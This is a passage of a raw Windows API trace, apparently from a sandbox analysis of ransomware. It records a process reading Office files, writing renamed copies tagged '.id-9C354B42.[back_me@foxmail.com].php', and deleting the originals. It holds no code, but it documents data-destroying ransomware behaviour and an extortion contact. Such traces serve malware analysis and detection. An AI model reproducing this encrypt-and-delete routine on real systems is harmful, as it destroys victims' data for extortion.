Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.874] lstrlenW (lpString=".doc") returned 4 [0251.874] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0251.874] lstrlenW (lpString=".docx") returned 5 [0251.874] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1 [0251.874] lstrlenW (lpString=".pdf") returned 4 [0251.874] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0251.874] lstrlenW (lpString=".xls") returned 4 [0251.874] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0251.874] lstrlenW (lpString=".xlsx") returned 5 [0251.874] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1 [0251.874] lstrlenW (lpString=".ppt") returned 4 [0251.874] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0251.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.874] lstrlenW (lpString=".zip") returned 4 [0251.874] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0251.874] lstrlenW (lpString=".rar") returned 4 [0251.874] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString=".bz2") returned 4 [0251.875] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString=".7z") returned 3 [0251.875] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString=".dbf") returned 4 [0251.875] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString=".1cd") returned 4 [0251.875] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString=".jpg") returned 4 [0251.875] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString=".doc") returned 4 [0251.875] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString=".docx") returned 5 [0251.875] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1 [0251.875] lstrlenW (lpString=".pdf") returned 4 [0251.875] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString=".xls") returned 4 [0251.875] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0251.875] lstrlenW (lpString=".xlsx") returned 5 [0251.875] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1 [0251.875] lstrlenW (lpString=".ppt") returned 4 [0251.875] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0251.875] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.875] lstrlenW (lpString=".zip") returned 4 [0251.875] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0251.876] lstrlenW (lpString=".rar") returned 4 [0251.876] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0251.876] lstrlenW (lpString=".bz2") returned 4 [0251.876] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0251.876] lstrlenW (lpString=".7z") returned 3 [0251.876] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0251.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.876] lstrlenW (lpString=".dbf") returned 4 [0251.876] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0251.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.876] lstrlenW (lpString=".1cd") returned 4 [0251.876] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0251.876] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DBWIZ.VSL") returned 57 [0251.876] lstrlenW (lpString=".jpg") returned 4 [0251.876] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0251.876] lstrcmpiW (lpString1=".DLL", lpString2=".php") returned -1 [0251.876] lstrlenW (lpString="DL_RES.DLL") returned 10 [0251.876] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.900] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=10632) returned 1 [0251.900] CloseHandle (hObject=0x3b8) returned 1 [0251.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll")) returned 0x20 [0251.900] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dl_res.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0251.900] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.901] lstrlenW (lpString=".doc") returned 4 [0251.901] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString=".docx") returned 5 [0251.901] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0251.901] lstrlenW (lpString=".pdf") returned 4 [0251.901] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString=".xls") returned 4 [0251.901] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString=".xlsx") returned 5 [0251.901] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0251.901] lstrlenW (lpString=".ppt") returned 4 [0251.901] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.901] lstrlenW (lpString=".zip") returned 4 [0251.901] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString=".rar") returned 4 [0251.901] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0251.901] lstrlenW (lpString=".bz2") returned 4 [0251.901] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0251.901] lstrlenW (lpString=".7z") returned 3 [0251.901] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString=".dbf") returned 4 [0251.902] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString=".1cd") returned 4 [0251.902] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString=".jpg") returned 4 [0251.902] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString=".doc") returned 4 [0251.902] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString=".docx") returned 5 [0251.902] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0251.902] lstrlenW (lpString=".pdf") returned 4 [0251.902] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString=".xls") returned 4 [0251.902] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString=".xlsx") returned 5 [0251.902] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0251.902] lstrlenW (lpString=".ppt") returned 4 [0251.902] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.902] lstrlenW (lpString=".zip") returned 4 [0251.902] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0251.902] lstrlenW (lpString=".rar") returned 4 [0251.903] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0251.903] lstrlenW (lpString=".bz2") returned 4 [0251.903] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0251.903] lstrlenW (lpString=".7z") returned 3 [0251.903] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0251.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.903] lstrlenW (lpString=".dbf") returned 4 [0251.903] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0251.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.903] lstrlenW (lpString=".1cd") returned 4 [0251.903] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0251.903] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DL_RES.DLL") returned 58 [0251.903] lstrlenW (lpString=".jpg") returned 4 [0251.903] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0251.903] lstrcmpiW (lpString1=".VRD", lpString2=".php") returned 1 [0251.903] lstrlenW (lpString="DOORSCHD.VRD") returned 12 [0251.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.904] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=1723) returned 1 [0251.904] CloseHandle (hObject=0x3b8) returned 1 [0251.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 0x20 [0251.904] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.904] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.904] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0251.909] GetLastError () returned 0x0 [0251.910] ReadFile (in: hFile=0x3b8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x6bb, lpOverlapped=0x0) returned 1 [0251.911] WriteFile (in: hFile=0x240, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x6c0, lpOverlapped=0x0) returned 1 [0251.912] ReadFile (in: hFile=0x3b8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.912] WriteFile (in: hFile=0x240, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0251.912] SetEndOfFile (hFile=0x240) returned 1 [0251.913] CloseHandle (hObject=0x240) returned 1 [0251.913] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.913] SetEndOfFile (hFile=0x3b8) returned 1 [0251.915] CloseHandle (hObject=0x3b8) returned 1 [0251.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.915] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\doorschd.vrd")) returned 1 [0251.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.915] lstrlenW (lpString=".doc") returned 4 [0251.915] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0251.915] lstrlenW (lpString=".docx") returned 5 [0251.915] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1 [0251.915] lstrlenW (lpString=".pdf") returned 4 [0251.915] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0251.915] lstrlenW (lpString=".xls") returned 4 [0251.915] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0251.915] lstrlenW (lpString=".xlsx") returned 5 [0251.915] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1 [0251.915] lstrlenW (lpString=".ppt") returned 4 [0251.915] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0251.915] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.915] lstrlenW (lpString=".zip") returned 4 [0251.916] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0251.916] lstrlenW (lpString=".rar") returned 4 [0251.916] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString=".bz2") returned 4 [0251.916] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString=".7z") returned 3 [0251.916] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString=".dbf") returned 4 [0251.916] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString=".1cd") returned 4 [0251.916] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString=".jpg") returned 4 [0251.916] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString=".doc") returned 4 [0251.916] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString=".docx") returned 5 [0251.916] lstrcmpiW (lpString1=".docx", lpString2="D.VRD") returned -1 [0251.916] lstrlenW (lpString=".pdf") returned 4 [0251.916] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString=".xls") returned 4 [0251.916] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0251.916] lstrlenW (lpString=".xlsx") returned 5 [0251.916] lstrcmpiW (lpString1=".xlsx", lpString2="D.VRD") returned -1 [0251.916] lstrlenW (lpString=".ppt") returned 4 [0251.916] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0251.916] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.916] lstrlenW (lpString=".zip") returned 4 [0251.917] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0251.917] lstrlenW (lpString=".rar") returned 4 [0251.917] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0251.917] lstrlenW (lpString=".bz2") returned 4 [0251.917] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0251.917] lstrlenW (lpString=".7z") returned 3 [0251.917] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0251.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.917] lstrlenW (lpString=".dbf") returned 4 [0251.917] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0251.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.917] lstrlenW (lpString=".1cd") returned 4 [0251.917] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0251.917] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DOORSCHD.VRD") returned 60 [0251.917] lstrlenW (lpString=".jpg") returned 4 [0251.917] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0251.917] lstrcmpiW (lpString1=".VSL", lpString2=".php") returned 1 [0251.917] lstrlenW (lpString="DRILLDWN.VSL") returned 12 [0251.917] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.918] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=64872) returned 1 [0251.918] CloseHandle (hObject=0x3b8) returned 1 [0251.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 0x20 [0251.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0251.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0251.919] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.919] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.919] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0251.919] GetLastError () returned 0x0 [0251.919] ReadFile (in: hFile=0x3b8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xfd68, lpOverlapped=0x0) returned 1 [0251.922] WriteFile (in: hFile=0x240, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xfd70, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xfd70, lpOverlapped=0x0) returned 1 [0251.924] ReadFile (in: hFile=0x3b8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0251.924] WriteFile (in: hFile=0x240, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xec, lpOverlapped=0x0) returned 1 [0251.924] SetEndOfFile (hFile=0x240) returned 1 [0251.924] CloseHandle (hObject=0x240) returned 1 [0251.924] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0251.924] SetEndOfFile (hFile=0x3b8) returned 1 [0251.927] CloseHandle (hObject=0x3b8) returned 1 [0251.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0251.927] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\drilldwn.vsl")) returned 1 [0251.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0251.927] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0251.927] lstrlenW (lpString=".doc") returned 4 [0251.928] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0251.928] lstrlenW (lpString=".docx") returned 5 [0251.928] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1 [0251.928] lstrlenW (lpString=".pdf") returned 4 [0251.928] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0251.928] lstrlenW (lpString=".xls") returned 4 [0251.928] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0251.928] lstrlenW (lpString=".xlsx") returned 5 [0251.928] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1 [0251.928] lstrlenW (lpString=".ppt") returned 4 [0251.928] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0251.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0251.928] lstrlenW (lpString=".zip") returned 4 [0251.928] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0251.928] lstrlenW (lpString=".rar") returned 4 [0251.928] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0251.928] lstrlenW (lpString=".bz2") returned 4 [0251.928] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0251.928] lstrlenW (lpString=".7z") returned 3 [0251.928] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0251.928] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0251.928] lstrlenW (lpString=".dbf") returned 4 [0252.045] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.045] lstrlenW (lpString=".1cd") returned 4 [0252.045] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.045] lstrlenW (lpString=".jpg") returned 4 [0252.045] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.045] lstrlenW (lpString=".doc") returned 4 [0252.045] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString=".docx") returned 5 [0252.045] lstrcmpiW (lpString1=".docx", lpString2="N.VSL") returned -1 [0252.045] lstrlenW (lpString=".pdf") returned 4 [0252.045] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString=".xls") returned 4 [0252.045] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1 [0252.045] lstrlenW (lpString=".xlsx") returned 5 [0252.045] lstrcmpiW (lpString1=".xlsx", lpString2="N.VSL") returned -1 [0252.045] lstrlenW (lpString=".ppt") returned 4 [0252.045] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1 [0252.045] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.045] lstrlenW (lpString=".zip") returned 4 [0252.045] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1 [0252.045] lstrlenW (lpString=".rar") returned 4 [0252.045] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1 [0252.046] lstrlenW (lpString=".bz2") returned 4 [0252.046] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1 [0252.046] lstrlenW (lpString=".7z") returned 3 [0252.046] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1 [0252.046] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\DRILLDWN.VSL") returned 60 [0252.046] lstrlenW (lpString=".dbf") returned 4 [0252.046] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1 [0252.046] lstrlenW (lpString="C:\\Program Files\\Microsoft 